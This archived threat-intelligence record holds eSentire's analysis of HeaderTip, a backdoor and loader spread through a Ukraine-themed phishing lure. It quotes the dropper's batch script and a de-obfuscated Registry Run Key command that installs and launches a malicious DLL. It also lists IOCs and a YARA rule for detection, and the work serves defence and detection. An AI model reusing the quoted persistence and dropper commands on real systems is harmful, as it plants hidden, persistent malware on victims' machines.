{
	"id": "52eddb1b-f6cc-4de7-b57f-8d7751e8d9b7",
	"created_at": "2026-04-06T00:19:01.700784Z",
	"updated_at": "2026-04-10T03:28:35.426938Z",
	"deleted_at": null,
	"sha1_hash": "1f2db31a37b269fba901945fa5bf39118fa46a08",
	"title": "eSentire | Threat Intelligence Malware Analysis: HeaderTip",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1571346,
	"plain_text": "eSentire | Threat Intelligence Malware Analysis: HeaderTip\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 14:22:31 UTC\r\nSince humans are still the weakest link in cybersecurity, threat actor(s) continue to prey on fallible human nature to launch cyberattacks. As the Russia-Ukraine conflict continues to impact the global economy and draw worldwide attention, these tensions create opportunities for threat actor(s) to design campaigns that exploit human vulnerabilities and anxieties stemming from the Russia-Ukraine conflict.\r\nHeaderTip is malware used by threat actor(s) that are leveraging the current Russia-Ukraine conflict to spread persistent malware. eSentire Threat Intelligence assesses with high confidence that HeaderTip serves as a backdoor and a loader for threat actor(s) to further deploy rootkits, trojans, or other types of malware.\r\neSentire’s Threat Intelligence team has performed a technical malware analysis on HeaderTip. This technical analysis provides a breakdown of how HeaderTip achieves persistence on the infected machine and how it obfuscates its code to evade detection.\r\nKey Takeaways\r\neSentire Threat Intelligence assesses with high confidence that the initial access vector for HeaderTip was a phishing attack.\r\nThe threat actor(s) is using obfuscation techniques in the malware sample to hinder analysis and avoid detection.\r\nThe malware achieves persistence via Registry Run Keys that link to the dropped files in the %TEMP% folder.\r\nHeaderTip utilizes ChangeIP for Dynamic DNS (DDNS), which allows the attacker(s) to evade detection.\r\neSentire’s Threat Response Unit (TRU) created two new detections to identify the HeaderTip malware.\r\nCase Study\r\nOn March 22, 2022, the Computer Emergency Response Team of Ukraine (CERT-UA) detected a RAR archive, whose name translates as “The preservation of video materials on criminal actions from Russian military”, from a Ukrainian organization. The malware campaign is dubbed HeaderTip and is being tracked as UAC-0026.\r\nCERT-UA reported that they observed similar activity in September 2020. In addition, researchers at SentinelOne have tied the malware campaign to the suspected Chinese threat group known as Scarab. The Scarab malware was first observed in 2012 targeting organizations in Russia, Ukraine, the United States, Chile, and Syria.\r\nTechnical Analysis on HeaderTip\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 1 of 12\r\nThe RAR archive contains an executable with the same naming convention as the archive. The executable has an embedded PDF file and is not signed. The 32-bit executable is written in C++ with a file size of 653 KB.\r\nAn overview of the malicious files, domains and IPs related to HeaderTip is shown in Exhibit 1.\r\nExhibit 1: Overview of HeaderTip malicious files from VirusTotal graph\r\nThe executable file contains an .RCData section with an embedded PDF file, which is likely used as bait. The PDF document contains information from the National Police of Ukraine with instructions on how to retain video evidence of criminal activities conducted by the Russian military in Ukraine so that it can be used in investigations by the Criminal Investigative Division of Ukraine (Exhibits 2-3).\r\nThe metadata indicates that the PDF document was created on March 16, 2022, which is the exact date on which the document was issued and signed. We assess with high confidence that the document was not forged. The document was written by a native Ukrainian speaker, based on grammatical accuracy and vocabulary.\r\nExhibit 2: The resource containing a PDF header and objects\r\nExhibit 3: The contents of the decoy PDF document\r\nThe second resource contains the dropped .BAT file (officecleaner.bat) with the following commands:\r\n@echo off\r\nset objfile=%temp%\\httpshelper.dll\r\nif not exist %objfile% (\r\n echo | set /p=\"M%fgopvhrsdfertj%Z\" > %objfile%\r\n type %temp%\\officecleaner.dat >> %objfile%\r\n del %temp%\\officecleaner.dat\r\n re%ooperoitlksdfgljjdfgijtrjg%g add HK%iwejhjkhkl%CU\\Software\\Microsoft\\Windows\\C%ljljlkwjefioflj\r\n start c:\\windows\\system32\\rundll32.exe %objfile%,OAService\r\n) else (\r\nset bat=\"bat\"\r\n)\r\nThese commands are responsible for the malicious .DLL (Dynamic Link Library) file (officecleaner.dat) dropped in the %TEMP% folder: they write the MZ signature (the magic bytes of the DOS header used by .EXE and .DLL files) as the first bytes of httpshelper.dll, append the contents of officecleaner.dat to it, and thereby rename officecleaner.dat to httpshelper.dll. Additionally, the batch file sets up a persistence mechanism via Registry Run Keys. The officecleaner.dat file is removed from the %TEMP% folder after the renaming succeeds (Exhibit 4).\r\nThe de-obfuscated command adds a Registry Run Key entry that runs the malicious httpshelper.dll file through its OAService export:\r\nreg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"httpshelper\" /d \"c:\\windows\\system32\\rundll32.exe httpshelper.dll,OAService\" /f\r\nstart c:\\windows\\system32\\rundll32.exe httpshelper.dll,OAService\r\nExhibit 4: The contents of the .BAT file\r\nThe third resource contains a .DLL file with a missing executable (MZ) header (Exhibit 5).\r\nExhibit 5: Resource containing the .DLL file\r\nUpon analyzing the executable file in a disassembler, we found another value being added to the Registry Run Keys (Exhibit 6):\r\n/c reg add HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v httpsrvlog /t REG_SZ /d\r\nThe added httpsrvlog value is responsible for running the officecleaner.bat file under the %TEMP% directory.\r\nExhibit 6: Registry Run Key added for httpsrvlog value\r\nWe have observed the following files being dropped in the %TEMP% folder after running the malicious executable:\r\nofficecleaner.bat: the batch file responsible for persistence of the .DLL file.\r\nofficecleaner.dat: the malicious .DLL file (before the PC reboot or execution of the batch file).\r\nhttpshelper.dll: the malicious .DLL file (after the PC reboot or execution of the batch file).\r\n#2163_02_33-2022.pdf: the decoy PDF file.\r\nAnalyzing the httpshelper.dll file\r\nThe 32-bit .DLL file is written in C++. The file is relatively small – 9.50 KB. Upon analyzing the file in a disassembler, we noticed that the malware hides its API imports by using stackstrings and resolving APIs dynamically at runtime (Exhibit 7).\r\nExhibit 7: Using stackstrings for obfuscation\r\nThe malware hashes the library and API function names with a ROR-13 calculation to evade detection. LoadLibraryA is used to load the Wininet library, which contains the functions that enable the application to interact with the HTTP protocol in our malware sample. The GetProcAddress API is used to resolve each function’s address (Exhibits 8-9).\r\nExhibit 8: Resolved APIs and kernel32 DLL\r\nExhibit 9: Using GetProcAddress to resolve the functions\r\nThe malicious DLL initiates the connection to the C2 domain over port 8080; the function resides in the export named OAService (Exhibit 10). The threat actor(s) is utilizing Dynamic DNS (DDNS) from ChangeIP with a hardcoded domain in the DLL sample, which means that infected machines connect to C2 servers using a domain name instead of an IP address. This gives the threat actor(s) a significant benefit: they can change the IP address behind the domain and do not have to rely on fixed IP addresses, which helps them avoid detection.\r\nExhibit 10: C2 connection over port 8080\r\nThe main C2 communication function is shown in Exhibit 11. The malware creates a POST request handle, checks whether the request was successfully received by the C2 server (HTTP response code 200), and reads 128 bytes of data received from the C2 server by calling the InternetReadFile API (Exhibit 12). It also uses the User-Agent string Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko for C2 communications.\r\nExhibit 11: Main C2 function\r\nWe also noticed a function containing a “Loader” string. We believe the function is responsible for loading the DLL into memory, using the VirtualAlloc API to allocate new memory regions inside the address space of the process (Exhibit 12). First, it checks whether the file contains an MZ header, then it loops through the first 4096 bytes of the DLL file (Exhibit 13).\r\nExhibit 12: Function checks for the MZ header and calls VirtualAlloc\r\nExhibit 13: The function loops through the first 4096 bytes of the DLL file\r\nWhat eSentire is doing about it\r\nOur Threat Response Unit (TRU) combines threat intelligence obtained from research, security incidents, and the external threat landscape to produce actionable outcomes for our customers. We are taking a holistic response approach to combat all malware by deploying countermeasures, such as:\r\nImplementing two new detections to identify HeaderTip malware across eSentire MDR (Managed Detection and Response) for Endpoint solutions.\r\nPerforming global threat hunts against the IOCs (Indicators of Compromise) and known suspicious activities associated with the HeaderTip malware.\r\nActively monitoring for any signs of compromise.\r\nOur detection content is supported by investigation runbooks, ensuring our SOC cyber analysts respond rapidly to any intrusion attempts. In addition, our Threat Response Unit closely monitors the threat landscape, addresses capability gaps and performs retroactive threat hunts to assess customer impact.\r\nRecommendations from eSentire’s Threat Response Unit (TRU)\r\nWe recommend implementing the following controls to help secure your organization against HeaderTip malware:\r\nConduct security awareness training to lower the risk of phishing threats.\r\nPatch any external-facing devices and applications on an ongoing basis. Conduct regular vulnerability scans to ensure your team is staying on top of identifying and patching all known vulnerabilities.\r\nEnsure your team is enforcing strong password policies for all employees as part of strengthening your organization’s overall cyber hygiene.\r\nImplement the Principle of Least Privilege (POLP), which requires giving each user only the permissions needed to complete their task and nothing more.\r\nWhile the Tactics, Techniques, and Procedures (TTPs) used by threat actor(s) grow in sophistication, they lead to a limited set of options at which critical business decisions must be made. Intercepting the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.\r\neSentire’s Threat Response Unit (TRU) is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.\r\nIf you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.\r\nLearn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.\r\nAppendix\r\nSources\r\nhttps://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/\r\nhttps://cert.gov.ua/article/38097\r\nhttps://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8bfa7311-fdd9-4f8d-b813-1ab6c9d2c363&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments\r\nIndicators of Compromise\r\nПро збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar: 839e968aa5a6691929b4d65a539c2261f4ecd1c504a8ba52abbfbac0774d6fa3 (SHA-256)\r\nПро збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.exe: 042271aadf2191749876fc99997d0e6bdd3b89159e7ab8cd11a9f13ae65fa6b1 (SHA-256)\r\n#2163_02_33-2022.pdf (decoy PDF): C0962437a293b1e1c2702b98d935e929456ab841193da8b257bd4ab891bf9f69 (SHA-256)\r\nofficecleaner.dat: a2ffd62a500abbd157e46f4caeb91217738297709362ca2c23b0c2d117c7df38\r\nofficecleaner.bat: 830c6ead1d972f0f41362f89a50f41d869e8c22ea95804003d2811c3a09c3160\r\nhttpshelper.dll: 63a218d3fc7c2f7fcadc0f6f907f326cc86eb3f8cf122704597454c34c141cf1\r\nC2 Domain: product2020[.]mrbasic[.]com\r\nIP: 104.155.198[.]25\r\nYara Rules\r\nThe Yara rule for the malicious DLL and the executable:\r\nimport \"pe\"\r\nimport \"math\"\r\n\r\nrule HeaderTip {\r\n    meta:\r\n        author = \"eSentire TI\"\r\n        date = \"03/27/2022\"\r\n        version = \"1.0\"\r\n    strings:\r\n        $string = \"%016I64x%08x\" wide fullword nocase\r\n        $user_agent = \"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\" wide fullword\r\n        $export = \"OAService\"\r\n        $dll_name = \"httpshelper.dll\"\r\n        $c2_domain = \"product2020.mrbasic.com\" wide fullword nocase\r\n    condition:\r\n        // a .text section with entropy >= 6 indicates packed or obfuscated code\r\n        for any i in (0..pe.number_of_sections - 1): (\r\n            math.entropy(pe.sections[i].raw_data_offset, pe.sections[i].raw_data_size) >= 6 and\r\n            pe.sections[i].name == \".text\"\r\n        ) and\r\n        all of them and\r\n        // MZ magic (PE) or ELF magic 0x464c457f at file offset 0\r\n        (uint16(0) == 0x5A4D or uint32(0) == 0x464c457f)\r\n}\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next Level MDR, connect with an eSentire Security Specialist now.\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip"
	],
	"report_names": [
		"esentire-threat-intelligence-malware-analysis-headertip"
	],
	"threat_actors": [
		{
			"id": "9099912b-a00a-4afb-8294-c6d35af421a1",
			"created_at": "2023-01-06T13:46:39.338108Z",
			"updated_at": "2026-04-10T02:00:03.292102Z",
			"deleted_at": null,
			"main_name": "Scarab",
			"aliases": [],
			"source_name": "MISPGALAXY:Scarab",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e7d03ac8-7d6f-4ea0-83a9-10dff2ea1486",
			"created_at": "2022-10-25T16:07:24.158325Z",
			"updated_at": "2026-04-10T02:00:04.884772Z",
			"deleted_at": null,
			"main_name": "Scarab",
			"aliases": [
				"UAC-0026"
			],
			"source_name": "ETDA:Scarab",
			"tools": [
				"Scieron"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434741,
	"ts_updated_at": 1775791715,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1f2db31a37b269fba901945fa5bf39118fa46a08.pdf",
		"text": "https://archive.orkl.eu/1f2db31a37b269fba901945fa5bf39118fa46a08.txt",
		"img": "https://archive.orkl.eu/1f2db31a37b269fba901945fa5bf39118fa46a08.jpg"
	}
}